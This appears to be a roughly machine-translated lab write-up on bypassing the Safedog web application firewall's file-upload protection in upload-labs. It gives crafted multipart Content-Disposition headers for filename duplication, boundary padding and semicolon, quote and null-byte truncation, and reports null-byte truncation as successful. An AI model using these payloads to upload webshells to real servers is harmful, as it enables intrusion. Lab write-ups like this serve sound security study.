Catalog

Environment building

File upload data analysis

waf Interception principle

Upload test

Character variation

Transformation Content-Disposition Value

The order is reversed

In exchange for name and filename The order of

Duplicate data

boundary The content is repeated

filename repeat

Data overflow

boundary Add garbage data to the string

boundray Insert garbage data at the end

name And filename Insert garbage data between

multipart/form-data And boundary Insert garbage data between

Data truncation

Carriage return and line feed truncation

Semicolon truncation

Quote truncation

00 truncation （success）

Environment building

1. Use phpstudy2016, because 2018 Will not generate apache service
2. Download the safety dog —> Reference resources

Be careful , To download apache edition

The vulnerability protection rules can be seen here

Protect on website — Vulnerability protection settings — Upload protection protects file uploads

File upload data analysis

The front-end upload page needs to specify enctype by multipart/from-data To upload files normally .

A normal file upload packet is roughly as follows ：

POST /upload-lab/Pass-01/index.php HTTP/1.1
Host: 192.168.111.167
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:68.0) Gecko/68.0 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; 
boundary=---------------------------338226918236832126084030069411
Content-Length: 986
Origin: http://192.168.111.167
Connection: close
Referer: http://192.168.111.167/upload-lab/Pass-01/index.php
Cookie: PHPSESSID=37tvo07m8lu02b0qdvefjtbua7
Upgrade-Insecure-Requests: 1

-----------------------------338226918236832126084030069411
Content-Disposition: form-data; name="upload_file"; filename="php.png"
Content-Type: image/png

<?phpxx?>

-----------------------------338226918236832126084030069411
Content-Disposition: form-data; name="submit"

 Upload 
-----------------------------338226918236832126084030069411--

• multipart/form-data（ Indicates that the request is a file upload request ）
• boundary character string ： Function as separator , To distinguish POST data

The file is uploaded where it can be modified in the data package

• Content-Disposition： Generally, it can be changed
• name： Form parameter values , Can't change
• filename： file name , You can change
• Content-Type： file MIME, Change as appropriate
• boundary： Content division , You can change

waf Interception principle

waf The detection of is mainly based on the following

• file name ： Resolve file name , Determine if it's on the blacklist .
• The contents of the document ： Parse the contents of the file , Judge whether it is webshell.
• File directory permissions ： This function requires a host WAF Realization , Such as cloud lock .

at present , It is common on the market to parse file names , minority WAF Is to parse the contents of the file , For example, Changting . Below , Are based on file name resolution , Like a safety dog .

The general steps are as follows ：

• obtain Request Header Inside Content-Type Value boundary value
• According to the first step boundary value , analysis POST data , Get the file name
• Judge whether the file name is in the blocking blacklist

Upload test

With upload-labs Take the first level as an example , To test

The safety dog detection rule is as long as filename Contained in the php Keywords are intercepted , Whether you include sensitive words in the file name or suffix, you will be blocked

1. Upload normal files , But the contents of the horse file

Visible does not intercept , The security dog does not filter the contents of the file

form-data Words and name The field value can be quoted or not, which will not affect the upload , But quotation marks must appear in pairs , Otherwise, the upload fails .

however filename Changing or removing quotation marks will be blocked

# Normal field 
Content-Disposition: form-data; name="upload_file"; filename="php.png"

#form-data Words and name The field value can be quoted or not, which will not affect the upload , But quotation marks must appear in pairs , Otherwise, the upload fails 
Content-Disposition: form-data; name=upload_file; filename="1.png"
Content-Disposition: form-data; name='upload_file'; filename="1.png"
Content-Disposition: 'form-data'; name=upload_file; filename="1.png"
Content-Disposition: "form-data"; name=upload_file; filename="1.png"

# however filename Value will be intercepted if the quotation marks are changed or removed 
Content-Disposition: form-data; name=upload_file; filename=2.png

As follows filename Values without quotation marks , Be intercepted

Character variation

Transformation Content-Disposition Value

some WAF When parsing , Think Content-Disposition The value must be form-data, Cause bypass . Actually Content-Disposition Can be arbitrarily transformed or empty .

Content-Disposition: form-d    ata; name="upload_file"; filename="1.png"
Content-Disposition: fora; name="upload_file"; filename="1.png"
Content-Disposition:name="upload_file"; filename="1.png"

Such as the Content-Disposition Setting the value of to null does not affect normal uploading

Try to bypass , Failure

The order is reversed

In exchange for name and filename The order of

Because it stipulates Content-Disposition Must be at the front , So we can only exchange name and filename The order of .

yes , we have WAF It may match name in front ,filename rearwards , Can result in bypassing .

Content-Disposition: form-data; filename="1.php"; name="upload_file"

Duplicate data

boundary The content is repeated

The following , It can be seen that the first one is uploaded she.png（ Not necessarily. ）

But these two filename As long as one exists php Keywords will be detected . If waf If only one file name is taken, it will be Bypass.

filename repeat

Content-Disposition: form-data; name="upload_file"; filename="shell.jpg filename="shell.jpg"; filename="shell.jpg"; filename="shell.jpg"; filename="shell.jpg"; filename="shell.jpg"; filename="shell.php";

Data overflow

boundary Add garbage data to the string

boundray The value of the string can be any data （ There is a certain length limit ）, When the length reaches WAF When it can't be handled , and Web The server can handle , Then you can bypass it WAF Upload files

Except for the last one boundary value , Others boundary Values need to be consistent , Otherwise, it will fail to upload . But if in one boundary Values are separated by commas , You can insert any data , Now these boundary It does not need to be consistent and will not affect the upload

WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9

Except for the last one boundray, The others insert the same garbage data , But no matter how much is added, it will still be blocked ！！

boundray Insert garbage data at the end

boundary You can insert any data , Then you can boundary Add a lot of garbage data at the end of the string . Here is the interception

name And filename Insert garbage data between

name And filename Insert a lot of garbage data between .

fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf

It's no use adding more

multipart/form-data And boundary Insert garbage data between

Can't get around

Data truncation

Carriage return and line feed truncation

POST The value of the request header （ Not the request header ） It's line changing , But there must be no blank line in the middle . if WAF Match file name to newline deadline , You can bypass

Intercept

Semicolon truncation

if WAF Match file names to semicolons , You can bypass

Content-Disposition: form-data; name="upload_file"; filename="2.png;.php"

Quote truncation

php<5.3 Single and double quotation mark truncation feature .

Content-Disposition: form-data; name="upload_file"; filename="shell.jpg'.php"
Content-Disposition: form-data; name="upload_file"; filename="shell.jpg".php"

00 truncation （success）

stay url in %00 Express ascll In the yard 0 , and ascii in 0 Reserved as special characters , So when url It appears that %00 The read is considered to have ended . Use here [0x00] Instead of 16 It's binary 00 character

Content-Disposition: form-data; name="upload_file"; filename="asd.php[0x00].jpg"

Upload files , Use Burp Grab the bag , take filename To change the value of ：asd.php;.jpg

Open after hex,（ Semicolon 16 Into the system for 0x3b） modify 16 Hexadecimal content , hold 3b Change to 00：

Successfully bypassed